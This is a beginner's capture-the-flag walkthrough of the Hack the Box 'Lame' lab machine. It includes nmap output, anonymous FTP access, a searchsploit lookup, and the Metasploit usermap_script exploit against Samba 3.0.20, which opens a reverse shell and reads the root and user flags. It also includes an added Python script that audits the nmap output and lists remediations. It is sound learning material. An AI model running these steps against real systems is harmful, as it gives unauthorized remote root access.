
Machine #1: <Hack the Box> Lame -Walkthrough-

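About me

I am a complete beginner at Hack the Box.
I started because it was recommended as a place to practice after finishing the Hacking Lab.

This time I had the chance to meet someone experienced,
so I wrote this Qiita post to keep notes on what I was taught.

I am writing down what I was taught some days later, so some parts may be vague.
These are notes for myself, but I would be grateful if you pointed out any mistakes or possible improvements.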

Machine

I was told this one is easy to start with.

nmap

First, use the nmap command to look for open ports.

root@kali:~# nmap -A 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 03:09 JST
Nmap scan report for 10.10.10.3
Host is up (0.26s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h53m34s, deviation: 2h49m45s, median: -3d02h53m37s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-07-30T11:16:36-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   254.89 ms 10.10.14.1
2   254.79 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.02 seconds

ftp

The FTP port was open and the output said "Anonymous FTP login allowed", so I tried this first.
I was asked for an ID and a password; entering Anonymous for both let me in.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

I have no idea what this shows or what is inside, so I move on to another approach.

ssh

SSH is open, so I asked whether I could get in that way.
I was told it is impossible without knowing the private key, so I gave up on it.

samba

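I was given an explanation of Samba and heard about the EternalBlue vulnerability and WannaCry.
I was also told that this port deserves attention whenever it is open.

Look for vulnerabilities with searchsploit.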

root@kali:~# searchsploit samba 3.0.20
----------------------------------------- ---------------------------------
 Exploit Title                           |  Path
----------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / S | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' ma | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow    | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow    | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service  | linux_x86/dos/36741.py
----------------------------------------- ---------------------------------
Shellcodes: No Results

Try to get in using Metasploit.

root@kali:~# msfconsole

     ,           ,
    /             \                                                        
   ((__---,,,---__))                                                       
      (_) O O (_)_________                                                 
         \ _ /            |\                                               
          o_o \   M S F   | \                                              
               \   _____  |  *                                             
                |||   WW|||                                                
                |||     |||                                                


       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2006 exploits - 1095 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use help <command> to learn more about any command
msf5 > search samba 3.0.20

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   auxiliary/admin/http/wp_easycart_privilege_escalation  2015-02-25       normal     Yes    WordPress WP EasyCart Plugin Privilege Escalation
   1   auxiliary/admin/smb/samba_symlink_traversal                             normal     No     Samba Symlink Directory Traversal
   2   auxiliary/dos/samba/lsa_addprivs_heap                                   normal     No     Samba lsa_io_privilege_set Heap Overflow
   3   auxiliary/dos/samba/lsa_transnames_heap                                 normal     No     Samba lsa_io_trans_names Heap Overflow
   4   auxiliary/dos/samba/read_nttrans_ea_list                                normal     No     Samba read_nttrans_ea_list Integer Overflow
   5   auxiliary/scanner/rsync/modules_list                                    normal     No     List Rsync Modules
   6   auxiliary/scanner/smb/smb_uninit_cred                                   normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   7   exploit/freebsd/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   8   exploit/linux/samba/chain_reply                        2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   9   exploit/linux/samba/is_known_pipename                  2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load                              
   10  exploit/linux/samba/lsa_transnames_heap                2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   11  exploit/linux/samba/setinfopolicy_heap                 2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   12  exploit/linux/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   13  exploit/multi/samba/nttrans                            2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   14  exploit/multi/samba/usermap_script                     2007-05-14       excellent  No     Samba "username map script" Command Execution                                
   15  exploit/osx/samba/lsa_transnames_heap                  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   16  exploit/osx/samba/trans2open                           2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   17  exploit/solaris/samba/lsa_transnames_heap              2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   18  exploit/solaris/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   19  exploit/unix/http/quest_kace_systems_management_rce    2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection                              
   20  exploit/unix/misc/distcc_exec                          2002-02-01       excellent  Yes    DistCC Daemon Command Execution                                              
   21  exploit/unix/webapp/citrix_access_gateway_exec         2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution                                      
   22  exploit/windows/fileformat/ms14_060_sandworm           2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution                
   23  exploit/windows/http/sambar6_search_results            2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   24  exploit/windows/license/calicclnt_getconfig            2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   25  exploit/windows/smb/group_policy_startup               2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   26  post/linux/gather/enum_configs                                          normal     No     Linux Gather Configurations

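A lot of results came up, so I asked which one to use and was told it is written in the searchsploit output.
I had been using the terminal in a small window, so I was told to enlarge it and run the command again.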

root@kali:~# searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                                                                   | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                                                                         | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                                                                    | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                                                                    | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                                                                            | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Sure enough, it was there.
I was told it is better to use the terminal in a large window.
Let's run it.

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.13:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Gs57Fw8K6z8xPvW1;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Gs57Fw8K6z8xPvW1\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:60860) at 2020-08-03 04:46:04 +0900

The step that sets RHOST is missing from the output above, but I actually ran set RHOST 10.10.10.3.
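Seen from the defender's side, the nmap output and the searchsploit title above already say what has to be fixed on this host. The Python below is an added example, not part of the original walkthrough: it parses nmap -A text output and reports those findings. The function names, the remediation strings and the embedded sample (lines taken from the scan above) are assumptions made for this example.

```python
import re

# Constructed sample: a subset of the lines from the nmap -A output in this article.
SAMPLE_NMAP = """\
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
SAMBA_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

# Range from the searchsploit title on this page: "Samba 3.0.20 < 3.0.25rc3".
# A final release sorts after its own release candidates, hence FINAL = infinity.
FINAL = float("inf")
AFFECTED_FROM = (3, 0, 20, 0)   # includes 3.0.20 release candidates, conservatively
FIXED_IN = (3, 0, 25, 3)        # 3.0.25rc3


def samba_version_key(banner):
    """Return a sortable (major, minor, patch, rc) tuple, or None without an exact version."""
    m = SAMBA_RE.search(banner)
    if not m:
        return None  # e.g. "3.X - 4.X" carries no usable version
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    rc = int(m.group(4)) if m.group(4) else FINAL
    return (major, minor, patch, rc)


def is_affected(banner):
    """True if the banner's Samba version lies inside the range named on this page."""
    key = samba_version_key(banner)
    return key is not None and AFFECTED_FROM <= key < FIXED_IN


def audit(nmap_text):
    """Return (port, finding, remediation) tuples; port is None for host-level results."""
    findings, port = [], None
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            if is_affected(m.group(3)):
                findings.append((port, "Samba version in range 3.0.20 < 3.0.25rc3",
                                 "upgrade Samba to 3.0.25rc3 or later"))
        elif line.startswith("Host script results"):
            port = None  # what follows describes the host, not one port
        elif "ftp-anon: Anonymous FTP login allowed" in line:
            findings.append((port, "anonymous FTP login allowed",
                             "set anonymous_enable=NO in vsftpd.conf"))
        elif "message_signing: disabled" in line:
            findings.append((port, "SMB message signing disabled",
                             "set 'server signing = mandatory' in smb.conf"))
    return findings


if __name__ == "__main__":
    for port, finding, fix in audit(SAMPLE_NMAP):
        print(f"{port or 'host'}: {finding} -> {fix}")
```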

Getting the flags

A shell came back, so I grab the user and root hashes.

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

cd root

ls
Desktop
reset_logs.sh
root.txt
vnc.log

cat root.txt
92caac3be140ef409e45721348a4e9df
cd home

ls
ftp
makis
service
user

cd makis

ls
user.txt

cat user.txt
69454a937d94f5f0225ea00acd2e84c5

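I was able to get the flags.

Impressions

I did not know where to start,
but working through it hands-on while being taught was a lot of fun.

According to the person who taught me,
it is fine to begin by following walkthroughs and gradually become able to do it on your own.

I still overwhelmingly lack knowledge, so I want to keep working hard from here.

Thank you for reading this clumsy article to the end.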

ajipon_44
I started this in place of a notebook. I would be grateful if you pointed out any mistakes or possible improvements.